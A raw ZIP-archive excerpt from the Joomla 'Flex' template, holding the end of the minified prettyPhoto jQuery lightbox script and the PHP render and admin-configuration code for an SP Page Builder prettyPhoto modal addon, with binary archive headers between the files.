self.pageYOffset?{scrollTop:self.pageYOffset,scrollLeft:self.pageXOffset}:document.documentElement&&document.documentElement.scrollTop?{scrollTop:document.documentElement.scrollTop,scrollLeft:document.documentElement.scrollLeft}:document.body?{scrollTop:document.body.scrollTop,scrollLeft:document.body.scrollLeft}:void 0}function g(){I=e(window).height(),j=e(window).width(),"undefined"!=typeof $pp_overlay&&$pp_overlay.height(e(document).height()).width(j)}function m(){isSet&&settings.overlay_gallery&&"image"==h(pp_images[set_position])?(itemWidth=57,navWidth="facebook"==settings.theme||"pp_default"==settings.theme?50:30,itemsPerPage=Math.floor((f.containerWidth-100-navWidth)/itemWidth),itemsPerPage=itemsPerPage<pp_images.length?itemsPerPage:pp_images.length,totalPage=Math.ceil(pp_images.length/itemsPerPage)-1,0==totalPage?(navWidth=0,$pp_gallery.find(".pp_arrow_next,.pp_arrow_previous").hide()):$pp_gallery.find(".pp_arrow_next,.pp_arrow_previous").show(),galleryWidth=itemsPerPage*itemWidth,fullGalleryWidth=pp_images.length*itemWidth,$pp_gallery.css("margin-left",-(galleryWidth/2+navWidth/2)).find("div:first").width(galleryWidth+5).find("ul").width(fullGalleryWidth).find("li.selected").removeClass("selected"),goToPage=Math.floor(set_position/itemsPerPage)<totalPage?Math.floor(set_position/itemsPerPage):totalPage,e.prettyPhoto.changeGalleryPage(goToPage),$pp_gallery_li.filter(":eq("+set_position+")").addClass("selected")):$pp_pic_holder.find(".pp_content").unbind("mouseenter mouseleave")}function u(){if(settings.social_tools&&(facebook_like_link=settings.social_tools.replace("{location_href}",encodeURIComponent(location.href))),settings.markup=settings.markup.replace("{pp_social}",""),e("body").append(settings.markup),$pp_pic_holder=e(".pp_pic_holder"),$ppt=e(".ppt"),$pp_overlay=e("div.pp_overlay"),isSet&&settings.overlay_gallery){currentGalleryPage=0,toInject="";for(var t=0;t<pp_images.length;t++)pp_images[t].match(/\b(jpg|jpeg|png|gif)\b/gi)?(classname="",img_src=pp_images[t]):(classname="default",img_src=""),toInject+="<li class='"+classname+"'><a href='#'><img src='"+img_src+"' width='50' alt='' /></a></li>";toInject=settings.gallery_markup.replace(/{gallery}/g,toInject),$pp_pic_holder.find("#pp_full_res").after(toInject),$pp_gallery=e(".pp_pic_holder .pp_gallery"),$pp_gallery_li=$pp_gallery.find("li"),$pp_gallery.find(".pp_arrow_next").click(function(){return e.prettyPhoto.changeGalleryPage("next"),e.prettyPhoto.stopSlideshow(),!1}),$pp_gallery.find(".pp_arrow_previous").click(function(){return e.prettyPhoto.changeGalleryPage("previous"),e.prettyPhoto.stopSlideshow(),!1}),$pp_pic_holder.find(".pp_content").hover(function(){$pp_pic_holder.find(".pp_gallery:not(.disabled)").fadeIn()},function(){$pp_pic_holder.find(".pp_gallery:not(.disabled)").fadeOut()}),itemWidth=57,$pp_gallery_li.each(function(t){e(this).find("a").click(function(){return e.prettyPhoto.changePage(t),e.prettyPhoto.stopSlideshow(),!1})})}settings.slideshow&&($pp_pic_holder.find(".pp_nav").prepend('<a href="#" class="pp_play">Play</a>'),$pp_pic_holder.find(".pp_nav .pp_play").click(function(){return e.prettyPhoto.startSlideshow(),!1})),$pp_pic_holder.attr("class","pp_pic_holder "+settings.theme),$pp_overlay.css({opacity:0,height:e(document).height(),width:e(window).width()}).bind("click",function(){settings.modal||e.prettyPhoto.close()}),e("a.pp_close").bind("click",function(){return e.prettyPhoto.close(),!1}),settings.allow_expand&&e("a.pp_expand").bind("click",function(){return e(this).hasClass("pp_expand")?(e(this).removeClass("pp_expand").addClass("pp_contract"),doresize=!1):(e(this).removeClass("pp_contract").addClass("pp_expand"),doresize=!0),n(function(){e.prettyPhoto.open()}),!1}),$pp_pic_holder.find(".pp_previous, .pp_nav .pp_arrow_previous").bind("click",function(){return e.prettyPhoto.changePage("previous"),e.prettyPhoto.stopSlideshow(),!1}),$pp_pic_holder.find(".pp_next, .pp_nav .pp_arrow_next").bind("click",function(){return e.prettyPhoto.changePage("next"),e.prettyPhoto.stopSlideshow(),!1}),c()}a=jQuery.extend({hook:"rel",animation_speed:"fast",ajaxcallback:function(){},slideshow:5e3,autoplay_slideshow:!1,opacity:.8,show_title:!0,allow_resize:!0,allow_expand:!0,default_width:500,default_height:344,counter_separator_label:"/",theme:"pp_default",horizontal_padding:20,hideflash:!1,wmode:"opaque",autoplay:!0,modal:!1,deeplinking:!0,overlay_gallery:!0,overlay_gallery_max:30,keyboard_shortcuts:!0,changepicturecallback:function(){},callback:function(){},ie6_fallback:!0,markup:'<div class="pp_pic_holder"> 						<div class="ppt">&nbsp;</div> 						<div class="pp_top"> 							<div class="pp_left"></div> 							<div class="pp_middle"></div> 							<div class="pp_right"></div> 						</div> 						<div class="pp_content_container"> 							<div class="pp_left"> 							<div class="pp_right"> 								<div class="pp_content"> 									<div class="pp_loaderIcon"></div> 									<div class="pp_fade"> 										<a href="#" class="pp_expand" title="Expand the image">Expand</a> 										<div class="pp_hoverContainer"> 											<a class="pp_next" href="#">next</a> 											<a class="pp_previous" href="#">previous</a> 										</div> 										<div id="pp_full_res"></div> 										<div class="pp_details"> 											<div class="pp_nav"> 												<a href="#" class="pp_arrow_previous">Previous</a> 												<p class="currentTextHolder">0/0</p> 												<a href="#" class="pp_arrow_next">Next</a> 											</div> 											<p class="pp_description"></p> 											<div class="pp_social">{pp_social}</div> 											<a class="pp_close" href="#">Close</a> 										</div> 									</div> 								</div> 							</div> 							</div> 						</div> 						<div class="pp_bottom"> 							<div class="pp_left"></div> 							<div class="pp_middle"></div> 							<div class="pp_right"></div> 						</div> 					</div> 					<div class="pp_overlay"></div>',gallery_markup:'<div class="pp_gallery"> 								<a href="#" class="pp_arrow_previous">Previous</a> 								<div> 									<ul> 										{gallery} 									</ul> 								</div> 								<a href="#" class="pp_arrow_next">Next</a> 							</div>',image_markup:'<img id="fullResImage" src="{path}" />',flash_markup:'<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="{width}" height="{height}"><param name="wmode" value="{wmode}" /><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="{path}" /><embed src="{path}" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="{width}" height="{height}" wmode="{wmode}"></embed></object>',quicktime_markup:'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" codebase="http://www.apple.com/qtactivex/qtplugin.cab" height="{height}" width="{width}"><param name="src" value="{path}"><param name="autoplay" value="{autoplay}"><param name="type" value="video/quicktime"><embed src="{path}" height="{height}" width="{width}" autoplay="{autoplay}" type="video/quicktime" pluginspage="http://www.apple.com/quicktime/download/"></embed></object>',iframe_markup:'<iframe src ="{path}" width="{width}" height="{height}" frameborder="no"></iframe>',inline_markup:'<div class="pp_inline">{content}</div>',custom_markup:"",social_tools:'<div class="twitter"><a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></div><div class="facebook"><iframe src="//www.facebook.com/plugins/like.php?locale=en_US&href={location_href}&layout=button_count&show_faces=true&width=500&action=like&font&colorscheme=light&height=23" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:23px;" allowTransparency="true"></iframe></div>'},a);var f,v,y,w,b,k,P,x=this,$=!1,I=e(window).height(),j=e(window).width();return doresize=!0,scroll_pos=_(),e(window).unbind("resize.prettyphoto").bind("resize.prettyphoto",function(){c(),g()}),a.keyboard_shortcuts&&e(document).unbind("keydown.prettyphoto").bind("keydown.prettyphoto",function(t){if("undefined"!=typeof $pp_pic_holder&&$pp_pic_holder.is(":visible"))switch(t.keyCode){case 37:e.prettyPhoto.changePage("previous"),t.preventDefault();break;case 39:e.prettyPhoto.changePage("next"),t.preventDefault();break;case 27:settings.modal||e.prettyPhoto.close(),t.preventDefault()}}),e.prettyPhoto.initialize=function(){return settings=a,"pp_default"==settings.theme&&(settings.horizontal_padding=16),theRel=e(this).attr(settings.hook),galleryRegExp=/\[(?:.*)\]/,isSet=galleryRegExp.exec(theRel)?!0:!1,pp_images=isSet?jQuery.map(x,function(t){return-1!=e(t).attr(settings.hook).indexOf(theRel)?e(t).attr("href"):void 0}):e.makeArray(e(this).attr("href")),pp_titles=isSet?jQuery.map(x,function(t){return-1!=e(t).attr(settings.hook).indexOf(theRel)?e(t).find("img").attr("alt")?e(t).find("img").attr("alt"):"":void 0}):e.makeArray(e(this).find("img").attr("alt")),pp_descriptions=isSet?jQuery.map(x,function(t){return-1!=e(t).attr(settings.hook).indexOf(theRel)?e(t).attr("title")?e(t).attr("title"):"":void 0}):e.makeArray(e(this).attr("title")),pp_images.length>settings.overlay_gallery_max&&(settings.overlay_gallery=!1),set_position=jQuery.inArray(e(this).attr("href"),pp_images),rel_index=isSet?set_position:e("a["+settings.hook+"^='"+theRel+"']").index(e(this)),u(this),settings.allow_resize&&e(window).bind("scroll.prettyphoto",function(){c()}),e.prettyPhoto.open(),!1},e.prettyPhoto.open=function(t){return"undefined"==typeof settings&&(settings=a,pp_images=e.makeArray(arguments[0]),pp_titles=e.makeArray(arguments[1]?arguments[1]:""),pp_descriptions=e.makeArray(arguments[2]?arguments[2]:""),isSet=pp_images.length>1?!0:!1,set_position=arguments[3]?arguments[3]:0,u(t.target)),settings.hideflash&&e("object,embed,iframe[src*=youtube],iframe[src*=vimeo]").css("visibility","hidden"),r(e(pp_images).size()),e(".pp_loaderIcon").show(),settings.deeplinking&&i(),settings.social_tools&&(facebook_like_link=settings.social_tools.replace("{location_href}",encodeURIComponent(location.href)),$pp_pic_holder.find(".pp_social").html(facebook_like_link)),$ppt.is(":hidden")&&$ppt.css("opacity",0).show(),$pp_overlay.show().fadeTo(settings.animation_speed,settings.opacity),$pp_pic_holder.find(".currentTextHolder").text(set_position+1+settings.counter_separator_label+e(pp_images).size()),"undefined"!=typeof pp_descriptions[set_position]&&""!=pp_descriptions[set_position]?$pp_pic_holder.find(".pp_description").show().html(unescape(pp_descriptions[set_position])):$pp_pic_holder.find(".pp_description").hide(),movie_width=parseFloat(o("width",pp_images[set_position]))?o("width",pp_images[set_position]):settings.default_width.toString(),movie_height=parseFloat(o("height",pp_images[set_position]))?o("height",pp_images[set_position]):settings.default_height.toString(),$=!1,-1!=movie_height.indexOf("%")&&(movie_height=parseFloat(e(window).height()*parseFloat(movie_height)/100-150),$=!0),-1!=movie_width.indexOf("%")&&(movie_width=parseFloat(e(window).width()*parseFloat(movie_width)/100-150),$=!0),$pp_pic_holder.fadeIn(function(){switch($ppt.html(settings.show_title&&""!=pp_titles[set_position]&&"undefined"!=typeof pp_titles[set_position]?unescape(pp_titles[set_position]):"&nbsp;"),imgPreloader="",skipInjection=!1,h(pp_images[set_position])){case"image":imgPreloader=new Image,nextImage=new Image,isSet&&set_position<e(pp_images).size()-1&&(nextImage.src=pp_images[set_position+1]),prevImage=new Image,isSet&&pp_images[set_position-1]&&(prevImage.src=pp_images[set_position-1]),$pp_pic_holder.find("#pp_full_res")[0].innerHTML=settings.image_markup.replace(/{path}/g,pp_images[set_position]),imgPreloader.onload=function(){f=l(imgPreloader.width,imgPreloader.height),s()},imgPreloader.onerror=function(){alert("Image cannot be loaded. Make sure the path is correct and image exist."),e.prettyPhoto.close()},imgPreloader.src=pp_images[set_position];break;case"youtube":f=l(movie_width,movie_height),movie_id=o("v",pp_images[set_position]),""==movie_id&&(movie_id=pp_images[set_position].split("youtu.be/"),movie_id=movie_id[1],movie_id.indexOf("?")>0&&(movie_id=movie_id.substr(0,movie_id.indexOf("?"))),movie_id.indexOf("&")>0&&(movie_id=movie_id.substr(0,movie_id.indexOf("&")))),movie="//www.youtube.com/embed/"+movie_id,movie+=o("rel",pp_images[set_position])?"?rel="+o("rel",pp_images[set_position]):"?rel=1",settings.autoplay&&(movie+="&autoplay=1"),toInject=settings.iframe_markup.replace(/{width}/g,f.width).replace(/{height}/g,f.height).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,movie);break;case"vimeo":f=l(movie_width,movie_height),movie_id=pp_images[set_position];var t=/http(s?):\/\/(www\.)?vimeo.com\/(\d+)/,i=movie_id.match(t);movie="http://player.vimeo.com/video/"+i[3]+"?title=0&byline=0&portrait=0",settings.autoplay&&(movie+="&autoplay=1;"),vimeo_width=f.width+"/embed/?moog_width="+f.width,toInject=settings.iframe_markup.replace(/{width}/g,vimeo_width).replace(/{height}/g,f.height).replace(/{path}/g,movie);break;case"quicktime":f=l(movie_width,movie_height),f.height+=15,f.contentHeight+=15,f.containerHeight+=15,toInject=settings.quicktime_markup.replace(/{width}/g,f.width).replace(/{height}/g,f.height).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,pp_images[set_position]).replace(/{autoplay}/g,settings.autoplay);break;case"flash":f=l(movie_width,movie_height),flash_vars=pp_images[set_position],flash_vars=flash_vars.substring(pp_images[set_position].indexOf("flashvars")+10,pp_images[set_position].length),filename=pp_images[set_position],filename=filename.substring(0,filename.indexOf("?")),toInject=settings.flash_markup.replace(/{width}/g,f.width).replace(/{height}/g,f.height).replace(/{wmode}/g,settings.wmode).replace(/{path}/g,filename+"?"+flash_vars);break;case"iframe":f=l(movie_width,movie_height),frame_url=pp_images[set_position],frame_url=frame_url.substr(0,frame_url.indexOf("iframe")-1),toInject=settings.iframe_markup.replace(/{width}/g,f.width).replace(/{height}/g,f.height).replace(/{path}/g,frame_url);break;case"ajax":doresize=!1,f=l(movie_width,movie_height),doresize=!0,skipInjection=!0,e.get(pp_images[set_position],function(e){toInject=settings.inline_markup.replace(/{content}/g,e),$pp_pic_holder.find("#pp_full_res")[0].innerHTML=toInject,s()});break;case"custom":f=l(movie_width,movie_height),toInject=settings.custom_markup;break;case"inline":myClone=e(pp_images[set_position]).clone().append('<br clear="all" />').css({width:settings.default_width}).wrapInner('<div id="pp_full_res"><div class="pp_inline"></div></div>').appendTo(e("body")).show(),doresize=!1,f=l(e(myClone).width(),e(myClone).height()),doresize=!0,e(myClone).remove(),toInject=settings.inline_markup.replace(/{content}/g,e(pp_images[set_position]).html())}imgPreloader||skipInjection||($pp_pic_holder.find("#pp_full_res")[0].innerHTML=toInject,s())}),!1},e.prettyPhoto.changePage=function(t){currentGalleryPage=0,"previous"==t?(set_position--,set_position<0&&(set_position=e(pp_images).size()-1)):"next"==t?(set_position++,set_position>e(pp_images).size()-1&&(set_position=0)):set_position=t,rel_index=set_position,doresize||(doresize=!0),settings.allow_expand&&e(".pp_contract").removeClass("pp_contract").addClass("pp_expand"),n(function(){e.prettyPhoto.open()})},e.prettyPhoto.changeGalleryPage=function(e){"next"==e?(currentGalleryPage++,currentGalleryPage>totalPage&&(currentGalleryPage=0)):"previous"==e?(currentGalleryPage--,currentGalleryPage<0&&(currentGalleryPage=totalPage)):currentGalleryPage=e,slide_speed="next"==e||"previous"==e?settings.animation_speed:0,slide_to=currentGalleryPage*itemsPerPage*itemWidth,$pp_gallery.find("ul").animate({left:-slide_to},slide_speed)},e.prettyPhoto.startSlideshow=function(){"undefined"==typeof P?($pp_pic_holder.find(".pp_play").unbind("click").removeClass("pp_play").addClass("pp_pause").click(function(){return e.prettyPhoto.stopSlideshow(),!1}),P=setInterval(e.prettyPhoto.startSlideshow,settings.slideshow)):e.prettyPhoto.changePage("next")},e.prettyPhoto.stopSlideshow=function(){$pp_pic_holder.find(".pp_pause").unbind("click").removeClass("pp_pause").addClass("pp_play").click(function(){return e.prettyPhoto.startSlideshow(),!1}),clearInterval(P),P=void 0},e.prettyPhoto.close=function(){$pp_overlay.is(":animated")||(e.prettyPhoto.stopSlideshow(),$pp_pic_holder.stop().find("object,embed").css("visibility","hidden"),e("div.pp_pic_holder,div.ppt,.pp_fade").fadeOut(settings.animation_speed,function(){e(this).remove()}),$pp_overlay.fadeOut(settings.animation_speed,function(){settings.hideflash&&e("object,embed,iframe[src*=youtube],iframe[src*=vimeo]").css("visibility","visible"),e(this).remove(),e(window).unbind("scroll.prettyphoto"),p(),settings.callback(),doresize=!0,v=!1,delete settings}))},!pp_alreadyInitialized&&t()&&(pp_alreadyInitialized=!0,hashIndex=t(),hashRel=hashIndex,hashIndex=hashIndex.substring(hashIndex.indexOf("/")+1,hashIndex.length-1),hashRel=hashRel.substring(0,hashRel.indexOf("/")),setTimeout(function(){e("a["+a.hook+"^='"+hashRel+"']:eq("+hashIndex+")").trigger("click")},50)),this.unbind("click.prettyphoto").bind("click.prettyphoto",e.prettyPhoto.initialize)}}(jQuery);var pp_alreadyInitialized=!1;PK!�J�N/N/4flex/sppagebuilder/addons/prettyphoto_modal/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

class SppagebuilderAddonPrettyphoto_modal extends SppagebuilderAddons{

	public function render() {
		
		// Include template's params
		$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
		$has_lazyload = $tpl_params->get('lazyload', 1);
		
		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';
		$title = (isset($this->addon->settings->title) && $this->addon->settings->title) ? $this->addon->settings->title : '';
		$heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h3';

		//Options
		$modal_selector = (isset($this->addon->settings->modal_selector) && $this->addon->settings->modal_selector) ? $this->addon->settings->modal_selector : '';
		$button_text = (isset($this->addon->settings->button_text) && $this->addon->settings->button_text) ? $this->addon->settings->button_text : '';
		$button_class = (isset($this->addon->settings->button_type) && $this->addon->settings->button_type) ? ' sppb-btn-' . $this->addon->settings->button_type : ' sppb-btn-default';
		$button_class .= (isset($this->addon->settings->button_size) && $this->addon->settings->button_size) ? ' sppb-btn-' . $this->addon->settings->button_size : '';
		$button_class .= (isset($this->addon->settings->button_shape) && $this->addon->settings->button_shape) ? ' sppb-btn-' . $this->addon->settings->button_shape: ' sppb-btn-rounded';
		$button_class .= (isset($this->addon->settings->button_appearance) && $this->addon->settings->button_appearance) ? ' sppb-btn-' . $this->addon->settings->button_appearance : '';
		$button_class .= (isset($this->addon->settings->button_block) && $this->addon->settings->button_block) ? ' ' . $this->addon->settings->button_block : '';
		//Pixeden Icons
		$button_peicon = (isset($this->addon->settings->button_peicon) && $this->addon->settings->button_peicon) ? $this->addon->settings->button_peicon : '';
		$button_icon = (isset($this->addon->settings->button_icon) && $this->addon->settings->button_icon) ? $this->addon->settings->button_icon : '';
		$button_icon_position = (isset($this->addon->settings->button_icon_position) && $this->addon->settings->button_icon_position) ? $this->addon->settings->button_icon_position: 'left';

		if($button_icon_position == 'left') {
			if ($button_peicon != '') {
				$button_text = ($button_peicon) ? '<i class="pe ' . $button_peicon . '"></i> ' . $button_text : $button_text;
			}else{
				$button_text = ($button_icon) ? '<i class="fa ' . $button_icon . '"></i> ' . $button_text : $button_text;
			}
		} else {
			if ($button_peicon != '') {
				$button_text = ($button_peicon) ? $button_text . ' <i style="margin-left:7px;margin-right:-1px;" class="pe ' . $button_peicon . '"></i>' : $button_text;
			}else{
				$button_text = ($button_icon) ? $button_text . ' <i style="margin-left:5px;margin-right:-1px;" class="fa ' . $button_icon . '"></i>' : $button_text;
			}
		}
		

		$selector_image = (isset($this->addon->settings->selector_image) && $this->addon->settings->selector_image) ? $this->addon->settings->selector_image : '';
		//Pixeden Icon
		$peicon_name = (isset($this->addon->settings->peicon_name) && $this->addon->settings->peicon_name) ? $this->addon->settings->peicon_name : '';
		$selector_icon_name = (isset($this->addon->settings->selector_icon_name) && $this->addon->settings->selector_icon_name) ? $this->addon->settings->selector_icon_name : '';
		$alignment = (isset($this->addon->settings->alignment) && $this->addon->settings->alignment) ? $this->addon->settings->alignment : '';
		$modal_unique_id = 'prettyphoto-modal-' . $this->addon->id;
		$modal_content_type = (isset($this->addon->settings->modal_content_type) && $this->addon->settings->modal_content_type) ? $this->addon->settings->modal_content_type : 'text';
		$modal_content_text = (isset($this->addon->settings->modal_content_text) && $this->addon->settings->modal_content_text) ? $this->addon->settings->modal_content_text : '';
		$modal_content_image = (isset($this->addon->settings->modal_content_image) && $this->addon->settings->modal_content_image) ? $this->addon->settings->modal_content_image : '';
		$modal_content_video_url = (isset($this->addon->settings->modal_content_video_url) && $this->addon->settings->modal_content_video_url) ? $this->addon->settings->modal_content_video_url : '';
		$modal_popup_width = (isset($this->addon->settings->modal_popup_width) && $this->addon->settings->modal_popup_width) ? $this->addon->settings->modal_popup_width : '';
		$modal_popup_height = (isset($this->addon->settings->modal_popup_height) && $this->addon->settings->modal_popup_height) ? $this->addon->settings->modal_popup_height : '';

		

		$output = '';

		if($modal_content_type == 'text') {
			$url = '#' . $modal_unique_id. '-content';
			$output .= '<div id="' . $modal_unique_id . '-content" style="display: none;">';
			$output .= '<div class="sppb-addon-modal-content clearfix">';
			$output .= $modal_content_text;
			$output .= '</div>';
			$output .= '</div>';
		} else if( $modal_content_type == 'video') {
			$url = $modal_content_video_url;
		} else {
			$url = $modal_content_image;
		}

		$output .= '<div class="' . $class . ' ' . $alignment . '">';

		if($modal_selector=='image') {
			
			if ($selector_image) {
				
				$output .= '<a class="sppb-modal-selector modal-selector-image" href="'. $url . '" id="'. $modal_unique_id .'">';
				// Image
				if(strpos($selector_image, 'http://') !== false || strpos($selector_image, 'https://') !== false){
					/* Lazyload for images with absolute URL */
					if($has_lazyload) {
						$output .= '<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. $selector_image .'" alt="'.$modal_selector.'">';
					} else {
						$output .= '<img src="' . $selector_image . '" alt="'.$modal_selector.'">';	
					}
				} else {
					/* Lazyload for images for relative URL (local image) */
					if($has_lazyload) {
						$output .= '<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. JUri::root() . $selector_image .'" alt="'.$modal_selector.'">';
					} else {
						$output .= '<img src="' . $selector_image . '" alt="'.$modal_selector.'">';	
					}
				}
				$output .= '</a>';
			}
		
		
		} else if ($modal_selector=='icon') {
			
			if($selector_icon_name || $peicon_name) {
				$output  .= '<a class="sppb-modal-selector" href="'. $url . '" id="'. $modal_unique_id .'">';
				$output  .= '<span>';
				if ($peicon_name != '') {
					$output  .= '<i class="pe ' . $peicon_name . '"></i>';
				}else{
					$output  .= '<i class="fa ' . $selector_icon_name . '"></i>';
				}
				$output  .= '</span>';
				$output  .= '</a>';
			}
		} else {
			$output .= '<a class="sppb-btn ' . $button_class . ' sppb-modal-selector" href="'. $url . '" id="'. $modal_unique_id .'">'. $button_text .'</a>';	
		}

		$output .= '</div>';

		return $output;

	}

	public function scripts() {
		$app = JFactory::getApplication();
		return array(JURI::base(true) . '/templates/'.$app->getTemplate().'/sppagebuilder/addons/prettyphoto_modal/js/jquery.prettyPhoto.js');
	}

	public function stylesheets() {
		$app = JFactory::getApplication();
		return array(JURI::base(true) . '/templates/'.$app->getTemplate().'/sppagebuilder/addons/prettyphoto_modal/css/prettyPhoto.css');
	}
	
	public function js() {
		$modal_popup_width = (isset($this->addon->settings->modal_popup_width) && $this->addon->settings->modal_popup_width) ? $this->addon->settings->modal_popup_width : '';
		$modal_popup_height = (isset($this->addon->settings->modal_popup_height) && $this->addon->settings->modal_popup_height) ? $this->addon->settings->modal_popup_height : '';
		$js ='jQuery(function($){$(document).ready(function(){$("#prettyphoto-modal-'.$this->addon->id.'").prettyPhoto({social_tools:false,theme:"sppb_prettyphoto",horizontal_padding:20,allow_resize:true,default_width:' . $modal_popup_width . ',default_height:' . $modal_popup_height . '})})});';

		return $js;
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$css = '';
		$modal_selector = (isset($this->addon->settings->modal_selector) && $this->addon->settings->modal_selector) ? $this->addon->settings->modal_selector : '';
		//Pixeden Icon
		$peicon_name = (isset($this->addon->settings->peicon_name) && $this->addon->settings->peicon_name) ? $this->addon->settings->peicon_name : '';
		//Fontawesome Icon
		$selector_icon_name = (isset($this->addon->settings->selector_icon_name) && $this->addon->settings->selector_icon_name) ? $this->addon->settings->selector_icon_name : '';
		$selector_style	= (isset($this->addon->settings->selector_margin_top) && $this->addon->settings->selector_margin_top) ? 'margin-top:' . (int) $this->addon->settings->selector_margin_top .'px;' : '';
		$selector_style	.= (isset($this->addon->settings->selector_margin_bottom) && $this->addon->settings->selector_margin_bottom) ? 'margin-bottom:' . (int) $this->addon->settings->selector_margin_bottom .'px;' : '';

		if($modal_selector == 'icon') {
		
			if($selector_icon_name || $peicon_name) {
			
				$selector_style	.= 'display:inline-block;line-height:1;';
				$selector_style	.= (isset($this->addon->settings->selector_icon_padding) && $this->addon->settings->selector_icon_padding) ? 'padding:' . (int) $this->addon->settings->selector_icon_padding .'px;' : '';
				$selector_style	.= (isset($this->addon->settings->selector_icon_color) && $this->addon->settings->selector_icon_color) ? 'color:' . $this->addon->settings->selector_icon_color .';' : '';
				$selector_style	.= (isset($this->addon->settings->selector_icon_background) && $this->addon->settings->selector_icon_background) ? 'background-color:' . $this->addon->settings->selector_icon_background .';' : '';
				$selector_style	.= (isset($this->addon->settings->selector_icon_border_color) && $this->addon->settings->selector_icon_border_color) ? 'border-style:solid;border-color:' . $this->addon->settings->selector_icon_border_color .';' : '';
				$selector_style	.= (isset($this->addon->settings->selector_icon_border_width) && $this->addon->settings->selector_icon_border_width) ? 'border-width:' . (int) $this->addon->settings->selector_icon_border_width .'px;' : '';
				$selector_style	.= (isset($this->addon->settings->selector_icon_border_radius) && $this->addon->settings->selector_icon_border_radius) ? 'border-radius:' . (int) $this->addon->settings->selector_icon_border_radius .'px;' : '';

				$selector_icon_style = (isset($this->addon->settings->selector_icon_size) && $this->addon->settings->selector_icon_size) ? 'font-size:' . (int) $this->addon->settings->selector_icon_size . 'px;width:' . (int) $this->addon->settings->selector_icon_size . 'px;height:' . (int) $this->addon->settings->selector_icon_size . 'px;line-height:' . (int) $this->addon->settings->selector_icon_size . 'px;' : '';

				if($selector_style) {
					$css .= $addon_id . ' .sppb-modal-selector span {';
					$css .= $selector_style;
					$css .= '}';
				}

				if($selector_icon_style) {
					$css .= $addon_id . ' .sppb-modal-selector span > i {';
					$css .= $selector_icon_style;
					$css .= '}';
				}

			}
		} else {
			if($selector_style) {
				$css .= $addon_id . ' .sppb-modal-selector {';
				$css .= $selector_style;
				$css .= '}';
			}
		}

		// Button css
		$layout_path = JPATH_ROOT . '/components/com_sppagebuilder/layouts';
		$css_path = new JLayoutFile('addon.css.button', $layout_path);
		$css .= $css_path->render(array('addon_id' => $addon_id, 'options' => $this->addon->settings, 'id' => 'sppb-modal-' . $this->addon->id . '-selector'));

		return $css;
	}

}
PK!�![�:�:5flex/sppagebuilder/addons/prettyphoto_modal/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_prettyphoto_modal',
		'category'=>'Flex',
		'title'=>JText::_('FLEX_ADDON_PRETTYPHOTO_MODAL'),
		'desc'=>JText::_('FLEX_ADDON_PRETTYPHOTO_MODAL_DESC'),
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'modal_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_DESC'),
					'values'=>array(
						'button'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_BUTTON'),
						'image'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_IMAGE'),
						'icon'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_TYPE_ICON'),
					),
					'std'=>'button',
				),

				// Button
				'button_text'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT_DESC'),
					'std'=>'Button Text',
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_fontstyle'=>array(
					'type'=>'select',
					'title'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_STYLE'),
					'values'=>array(
						'underline'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UNDERLINE'),
						'uppercase'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UPPERCASE'),
						'italic'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_ITALIC'),
						'lighter'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_LIGHTER'),
						'normal'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_NORMAL'),
						'bold'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLD'),
